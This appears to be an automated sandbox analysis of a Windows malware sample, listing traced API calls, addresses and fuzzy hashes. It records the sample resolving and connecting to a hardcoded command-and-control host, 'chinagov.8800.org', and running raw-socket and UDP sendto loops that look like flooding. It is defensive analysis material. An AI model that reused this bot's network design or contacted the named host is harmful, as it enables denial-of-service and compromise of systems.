                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                                                                              • String ID:
                                                                                              • API String ID: 964154963-0
                                                                                              • Opcode ID: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                                                                              • Instruction ID: a79ab9a2dfc38e3776cf33d79ac1821f4f8275b6afc8926fd1558f3327be2bb1
                                                                                              • Opcode Fuzzy Hash: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                                                                              • Instruction Fuzzy Hash: CAE0C972406260FBD3216BA1AE4DDAB3E68FB0A3A1F144235F359B50F5DB340854CBA9

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202), ref: 00405137
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,004048AA,00000000,00000000,00000000), ref: 00405149
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405157
                                                                                              • CloseHandle.KERNEL32 ref: 00405163
                                                                                              • closesocket.WS2_32 ref: 0040516F
                                                                                              • Sleep.KERNELBASE(0000012C), ref: 0040517A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                                                                              • String ID:
                                                                                              • API String ID: 964154963-0
                                                                                              • Opcode ID: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                                                                              • Instruction ID: 597c19437f16af45fe4c7fafc924f242b911babb52725cfa5b12b60dc2fdca2e
                                                                                              • Opcode Fuzzy Hash: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                                                                              • Instruction Fuzzy Hash: D0E0C076406160BFD3216BA1EF4DD9B3E68EF0A361B044135F35AB44F5C6780454CBA9
                                                                                              APIs
                                                                                              • htons.WS2_32(00001F9A), ref: 00404861
                                                                                                • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                                                                                • Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                                                                                • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                                                                                • Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B
                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
                                                                                              • connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
                                                                                              • closesocket.WS2_32(00000000), ref: 0040489A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProcclosesocketconnectgethostbynamehtonsinet_addrsocket
                                                                                              • String ID: chinagov.8800.org
                                                                                              • API String ID: 1138879652-2288617695
                                                                                              • Opcode ID: ab95bdf708f1f7cba5c66944165f83f70453277af22b67548b5d61e04670a3d0
                                                                                              • Instruction ID: aa8867dea59f3e018d1c3fe77959f1df48631034d4a5c4a8dfe27a3f3de7d62f
                                                                                              • Opcode Fuzzy Hash: ab95bdf708f1f7cba5c66944165f83f70453277af22b67548b5d61e04670a3d0
                                                                                              • Instruction Fuzzy Hash: 5DF08235A002247AEB1067A49D0ABEE7668EF09764F104726F721BA1E1D7B84550879D
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 004051F9
                                                                                              • Sleep.KERNELBASE(00000064), ref: 00405207
                                                                                                • Part of subcall function 0040507D: time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
                                                                                                • Part of subcall function 0040507D: _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
                                                                                                • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                                                                              • atoi.MSVCRT(?,?), ref: 0040521C
                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040522D
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,00405126,00000000,00000000,00000000), ref: 0040523B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$CreateStartupThread_localtime32atoitimewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3108282239-0
                                                                                              • Opcode ID: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
                                                                                              • Instruction ID: 0daf81d4eef7f1fa0beb5b5478619bf314a177f2874e1709eaed204b22834378
                                                                                              • Opcode Fuzzy Hash: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
                                                                                              • Instruction Fuzzy Hash: 68F03776D00218AEE71067B0AD4EFBB776CEB08710F000066BA45F60D1D6749D548EB5
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00405198
                                                                                              • Sleep.KERNELBASE(00000064), ref: 004051A6
                                                                                                • Part of subcall function 0040507D: time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
                                                                                                • Part of subcall function 0040507D: _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
                                                                                                • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                                                                              • atoi.MSVCRT(?,?), ref: 004051BB
                                                                                              • Sleep.KERNELBASE(00000064), ref: 004051CC
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,004050CA,00000000,00000000,00000000), ref: 004051DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$CreateStartupThread_localtime32atoitimewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3108282239-0
                                                                                              • Opcode ID: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
                                                                                              • Instruction ID: f150061eb18795c979dcc7452c8c87f20c1a6e1286e61ebe96203e18624e51ff
                                                                                              • Opcode Fuzzy Hash: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
                                                                                              • Instruction Fuzzy Hash: F3F030B6D0022CAEE71067B0AD4EFBB776CEB08710F000066BA45F60D1E6749D848EB9
                                                                                              APIs
                                                                                              • select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00403706
                                                                                              • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0040371F
                                                                                              • recv.WS2_32(00000000,?,00000008,00000000), ref: 00403738
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: recvselect
                                                                                              • String ID: Defghi Klmnopqr Tuv
                                                                                              • API String ID: 741273618-1553144822
                                                                                              • Opcode ID: 027ff2441b7a9df93180c891504bafdcf51998b41a4abf2c8db8189f6d2e3e47
                                                                                              • Instruction ID: 29f9e6de88a75dcdd7812cd5ab187c77c919a30331352215288d74a330fee493
                                                                                              • Opcode Fuzzy Hash: 027ff2441b7a9df93180c891504bafdcf51998b41a4abf2c8db8189f6d2e3e47
                                                                                              • Instruction Fuzzy Hash: 1111C4F1600214ABDB309E68CDC4BDA7E9C9B04795F004635BA59FB2D0D3B5EE808A58
                                                                                              APIs
                                                                                              • select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040382A
                                                                                              • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00403843
                                                                                              • recv.WS2_32(00000000,?,00000008,00000000), ref: 0040385C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: recvselect
                                                                                              • String ID: Defghi Klmnopqr Tuv
                                                                                              • API String ID: 741273618-1553144822
                                                                                              • Opcode ID: 36543b925f275196894919caea4c5fa10a05e6b03b8851fbac056ab2d5a050a6
                                                                                              • Instruction ID: 0644feca00c3923390fafb838483ae5f7d21c05a749549fcef03ec3df5c1d209
                                                                                              • Opcode Fuzzy Hash: 36543b925f275196894919caea4c5fa10a05e6b03b8851fbac056ab2d5a050a6
                                                                                              • Instruction Fuzzy Hash: 5E11D6B26002146BDB20AF69CDC9FDB3EECAB04391F004675BA19F61D0D3B4CE8087A4
                                                                                              APIs
                                                                                              • time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
                                                                                              • _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
                                                                                              • wsprintfA.USER32 ref: 004050BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _localtime32timewsprintf
                                                                                              • String ID: %04d%02d%02d
                                                                                              • API String ID: 1589165986-2607228566
                                                                                              • Opcode ID: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                                                                              • Instruction ID: 6ead3e3b7a45fc54b5a265f10b09fe02a5435c176a1f4316584398403dd6ae14
                                                                                              • Opcode Fuzzy Hash: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                                                                              • Instruction Fuzzy Hash: ACF01C32900108AFDF05ABD9DE49FEF7BB8EB48311F100021FA06FA2A1D6755A55DBA5
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadwsprintf
                                                                                              • String ID: hra%u.dll
                                                                                              • API String ID: 2341783205-640331709
                                                                                              • Opcode ID: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
                                                                                              • Instruction ID: 9e1dc9a3bb07ee0ff9ba8cfb77d47e9a35d0c50c1dd6ee90f04faac7d43bcb07
                                                                                              • Opcode Fuzzy Hash: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
                                                                                              • Instruction Fuzzy Hash: 2DD0A7F494020D67CB1097B4EE4EFC533AC5B14704F000170B746F20D0EAF4D1C88A99
                                                                                              APIs
                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040404E
                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 0040405E
                                                                                              • closesocket.WS2_32(00000000), ref: 0040406A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: closesocketconnectsocket
                                                                                              • String ID:
                                                                                              • API String ID: 643388700-0
                                                                                              • Opcode ID: 704ec3d58031ae9566a14cd635759ccef3e5688480f9d65bb8d4a30476373885
                                                                                              • Instruction ID: ece53a1abfa9a1dc296c5e5858b9221d35fcadf656f3c6bdee4a2ab28144fa03
                                                                                              • Opcode Fuzzy Hash: 704ec3d58031ae9566a14cd635759ccef3e5688480f9d65bb8d4a30476373885
                                                                                              • Instruction Fuzzy Hash: AEE08C30A0052077E22023285D4AFEA3A18AF097B0F900722F735F91E1D7755800429A
                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                                                                              • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Ioctlsetsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 1903391676-0
                                                                                              • Opcode ID: ed409dae48886ca97f11c84a6ab00aa046e863856f39508a752c3b793d34e51f
                                                                                              • Instruction ID: 0a608003f12cb1d16ace490882b1a903705aebf6f6dc81f323932ad210811262
                                                                                              • Opcode Fuzzy Hash: ed409dae48886ca97f11c84a6ab00aa046e863856f39508a752c3b793d34e51f
                                                                                              • Instruction Fuzzy Hash: 49F01CB5500209BEFB119F50DD09FAA3B6CEB04708F008125BE05E91D0D7B496488B94
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNELBASE(00000000,00000000,00000104,00000001), ref: 00402AC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 514040917-0
                                                                                              • Opcode ID: 1499fcb644ca70f17a514ae5522f0da01c8a4b91eeac3f71c21a923c145b40a4
                                                                                              • Instruction ID: 64dc199527a0429f388a9fd382f518a580a3f98e4aa8d30c949afc931af75c40
                                                                                              • Opcode Fuzzy Hash: 1499fcb644ca70f17a514ae5522f0da01c8a4b91eeac3f71c21a923c145b40a4
                                                                                              • Instruction Fuzzy Hash: C5E012F6A0425C7BEF609668DD86FC5B7B8A754704F0004F2E789B60D0D6F06ACD8E55
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,?,?,00000000,00000000), ref: 0040310B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: 5bf4f389a55ba3d56e94b3af9fbd44d165b497852bd63959914ec1e092303f7a
                                                                                              • Instruction ID: 5b36b277475b3b2f29725254a5d092a25ff950edcda12b5ed3701cdde0b1e55c
                                                                                              • Opcode Fuzzy Hash: 5bf4f389a55ba3d56e94b3af9fbd44d165b497852bd63959914ec1e092303f7a
                                                                                              • Instruction Fuzzy Hash: ADB002B6514381BFFB41DFA09E18C3BBAADFB94301B054C19B9D1D1524D7358868DB35
                                                                                              APIs
                                                                                              • EnumResourceNamesA.KERNEL32(00000000,0000000A,Function_00005244,00000000), ref: 00405341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EnumNamesResource
                                                                                              • String ID:
                                                                                              • API String ID: 3334572018-0
                                                                                              • Opcode ID: 994779acdd13945076b11be33b1db5ce95c1c4d32d58db4b2fc17c908424ab8f
                                                                                              • Instruction ID: 317f5d7f5b6160c4595255c7946ecd39f0252e0528535c85dd973ab848fd640b
                                                                                              • Opcode Fuzzy Hash: 994779acdd13945076b11be33b1db5ce95c1c4d32d58db4b2fc17c908424ab8f
                                                                                              • Instruction Fuzzy Hash: 95A00120BC474066ED6066606E4BF052520AB52F46F2001A5B2467D4E445E420418D5A
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 004074A4
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004074AD
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 004074BB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004074BE
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004074CE
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004074D1
                                                                                              • socket.WS2_32(00000002,00000003,000000FF), ref: 004075A9
                                                                                              • inet_addr.WS2_32 ref: 0040764A
                                                                                              • sendto.WS2_32(?,?,00000033,00000000,?,00000010), ref: 0040789E
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 004078E3
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00407904
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040790B
                                                                                              • wsprintfA.USER32 ref: 0040799E
                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00407A07
                                                                                              • Sleep.KERNEL32(000007D0), ref: 00407A12
                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00407A1B
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00407A1F
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 00407A25
                                                                                              • wsprintfA.USER32 ref: 00407A7B
                                                                                              • send.WS2_32(00000000,?,?,00000000), ref: 00407ACE
                                                                                              • Sleep.KERNEL32(00000032,?,00000000), ref: 00407AD9
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 00407AE4
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket,?,00000001,00000000,76F90F00), ref: 00407B04
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407B0B
                                                                                              • wsprintfA.USER32 ref: 00407B90
                                                                                                • Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
                                                                                                • Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C73
                                                                                                • Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
                                                                                                • Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C84
                                                                                                • Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
                                                                                                • Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C95
                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00407C17
                                                                                              • Sleep.KERNEL32(00001388), ref: 00407C26
                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00407C33
                                                                                              • wsprintfA.USER32 ref: 00407C6C
                                                                                              • wsprintfA.USER32 ref: 00407C91
                                                                                                • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                                                                                • Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                                                                              • send.WS2_32(00000000,?,?,00000000), ref: 00407D69
                                                                                              • Sleep.KERNEL32(0000000A,?,00000000), ref: 00407D70
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 00407D7A
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00407DAA
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407DB3
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00407DC1
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407DC4
                                                                                              • socket.WS2_32(00000002,00000002,00000000), ref: 00407E2A
                                                                                              • sendto.WS2_32(00000000,?,-00000800,00000000,?,00000010), ref: 00407EA5
                                                                                              • Sleep.KERNEL32(00000005), ref: 00407EB7
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 00407ECD
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00407EF4
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407EFB
                                                                                              • wsprintfA.USER32 ref: 00407F74
                                                                                              • wsprintfA.USER32 ref: 00407FB6
                                                                                              • send.WS2_32(00000000,?,?,00000000), ref: 00408010
                                                                                              • Sleep.KERNEL32(00000032,?,00000000), ref: 00408019
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 0040801F
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00408044
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040804B
                                                                                              • wsprintfA.USER32 ref: 004080B3
                                                                                              • wsprintfA.USER32 ref: 004080CF
                                                                                                • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                                                                                • Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                                                                                • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                                                                                • Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B
                                                                                                • Part of subcall function 00408680: socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
                                                                                              • send.WS2_32(00000000,?,?,00000000), ref: 00408110
                                                                                              • Sleep.KERNEL32(00000005,?,00000000), ref: 00408119
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 00408126
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00408176
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00408188
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040819D
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004081AF
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
